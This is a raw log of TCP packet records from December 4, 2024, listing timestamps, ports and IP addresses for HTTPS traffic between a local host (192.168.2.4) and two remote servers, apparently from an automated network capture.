Dec 4, 2024 12:17:38.005378008 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:38.005484104 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:38.006582975 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:38.006607056 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:38.231472015 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:38.231498957 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:38.231575966 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:38.231923103 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:38.231930971 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:38.239236116 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.239880085 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.239901066 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.240391016 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.240396023 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.301593065 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.301616907 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.301703930 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.301727057 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.301770926 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.302035093 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.302038908 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.302053928 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.302207947 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.302244902 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.304843903 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.305068970 CET	49857	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.305088997 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.305162907 CET	49857	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.305313110 CET	49857	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.305325985 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.369318008 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.373645067 CET	49853	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.373666048 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.374176979 CET	49853	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.374182940 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.426975965 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.427515030 CET	49854	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.427525997 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.428010941 CET	49854	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.428014994 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.510102034 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.512505054 CET	49855	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.512526989 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.512978077 CET	49855	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.512984037 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.689328909 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.689352036 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.689440966 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.689466953 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.689749956 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.689764023 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.689774990 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.689903975 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.689939022 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.689990044 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.692775965 CET	49858	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.692821026 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.692882061 CET	49858	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.693053007 CET	49858	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.693065882 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.820672035 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.823574066 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.823657036 CET	49853	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.824765921 CET	49853	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.824784994 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.824796915 CET	49853	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.824801922 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.850300074 CET	49859	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.850333929 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.850430965 CET	49859	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.850589037 CET	49859	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.850600958 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.870783091 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.870857954 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.870913029 CET	49854	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.872692108 CET	49854	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.872704029 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.872719049 CET	49854	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.872723103 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.897758007 CET	49860	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.897793055 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.897886992 CET	49860	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.898060083 CET	49860	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.898073912 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.954066992 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.954216003 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.954278946 CET	49855	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.954631090 CET	49855	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.954648018 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.954662085 CET	49855	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.954667091 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.969681978 CET	49861	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.969715118 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.969815969 CET	49861	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.969954967 CET	49861	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:38.969968081 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:39.305912971 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.305946112 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.306029081 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.306256056 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.306268930 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.629240036 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.629293919 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.629852057 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.629863024 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.632210016 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.632216930 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.632474899 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.632492065 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.632574081 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.632589102 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.632699013 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.632817030 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.632940054 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.632963896 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.632977962 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.632987976 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.633063078 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.633073092 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:39.633090973 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:39.633096933 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.115411997 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.117686033 CET	49857	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.117719889 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.118182898 CET	49857	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.118189096 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.501991987 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.502584934 CET	49858	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.502597094 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.503113031 CET	49858	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.503118992 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.559619904 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.563328981 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.565198898 CET	49857	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.565257072 CET	49857	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.565277100 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.565288067 CET	49857	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.565293074 CET	443	49857	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.568322897 CET	49863	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.568373919 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.568454981 CET	49863	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.568605900 CET	49863	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.568619967 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.624326944 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.625406981 CET	49859	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.625432014 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.625909090 CET	49859	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.625914097 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.703155041 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.706865072 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.707444906 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.707456112 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.709810019 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.709819078 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.709887981 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.709902048 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.709907055 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.709913969 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.709980965 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.710001945 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.710285902 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.710314035 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.714975119 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.714999914 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715014935 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715020895 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715029001 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715034962 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715055943 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715066910 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715156078 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715163946 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715174913 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715178967 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715198040 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715207100 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715248108 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715261936 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715280056 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715291023 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715301037 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715338945 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715346098 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715354919 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715358973 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715384960 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715394974 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715421915 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715436935 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715460062 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715470076 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715517044 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715527058 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715538979 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715545893 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715554953 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715558052 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715584040 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715590954 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715637922 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715651035 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715682030 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715689898 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715701103 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715706110 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715718985 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715724945 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715766907 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715780973 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715786934 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715790033 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715826035 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715832949 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.715841055 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:40.715845108 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:40.937899113 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.940862894 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.945856094 CET	49858	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.945944071 CET	49858	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.945944071 CET	49858	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.945967913 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.945976973 CET	443	49858	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.958863020 CET	49864	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.958901882 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:40.959019899 CET	49864	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.965646029 CET	49864	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:40.965660095 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.059140921 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.062069893 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.062159061 CET	49859	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:41.062391996 CET	49859	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:41.062412024 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.062423944 CET	49859	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:41.062434912 CET	443	49859	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.065347910 CET	49865	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:41.065385103 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.065464973 CET	49865	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:41.065617085 CET	49865	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:41.065628052 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.408375978 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:41.408457994 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:41.408545017 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:41.409545898 CET	49856	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:41.409559965 CET	443	49856	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:41.897099972 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.930982113 CET	49860	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:41.931000948 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:41.931863070 CET	49860	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:41.931869030 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.214272022 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.229760885 CET	49861	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.229789019 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.230427027 CET	49861	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.230431080 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.325177908 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:42.325213909 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:42.325313091 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:42.325582981 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:42.325598955 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:42.341655970 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.345031023 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.345102072 CET	49860	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.345262051 CET	49860	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.345262051 CET	49860	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.345277071 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.345285892 CET	443	49860	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.347989082 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.348018885 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.348083019 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.348221064 CET	49867	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.348228931 CET	443	49867	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.350097895 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.350466967 CET	49863	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.350480080 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.350919008 CET	49863	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.350924969 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.658128023 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.658216953 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.658287048 CET	49861	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.658520937 CET	49861	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.658540010 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.658551931 CET	49861	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.658557892 CET	443	49861	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.661839962 CET	49868	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.661891937 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.661990881 CET	49868	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.662187099 CET	49868	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.662203074 CET	443	49868	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.746548891 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.747230053 CET	49864	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.747257948 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.747746944 CET	49864	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.747752905 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.798831940 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.798906088 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.798975945 CET	49863	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.799174070 CET	49863	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.799187899 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.799196959 CET	49863	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.799204111 CET	443	49863	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.802489996 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.802524090 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.802608013 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.802784920 CET	49869	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.802799940 CET	443	49869	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.848968029 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:42.849045992 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:42.849160910 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:42.849797964 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.850275993 CET	49862	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:42.850276947 CET	49865	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.850286961 CET	443	49862	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:42.850296021 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:42.850871086 CET	49865	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:42.850877047 CET	443	49865	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:43.190578938 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:43.193968058 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:43.194017887 CET	49864	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:43.194072008 CET	49864	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:43.194094896 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:43.194113016 CET	49864	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:43.194119930 CET	443	49864	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:43.197396994 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:43.197454929 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:43.197513103 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:43.197755098 CET	49870	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:43.197770119 CET	443	49870	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:43.476886034 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.476946115 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.477032900 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.477302074 CET	49871	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.477317095 CET	443	49871	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.767676115 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.767755032 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.768275976 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.768286943 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.770351887 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.770356894 CET	443	49866	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:43.770446062 CET	49866	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:43.770462036 CET	443	49866	159.69.102.165	192.168.2.4
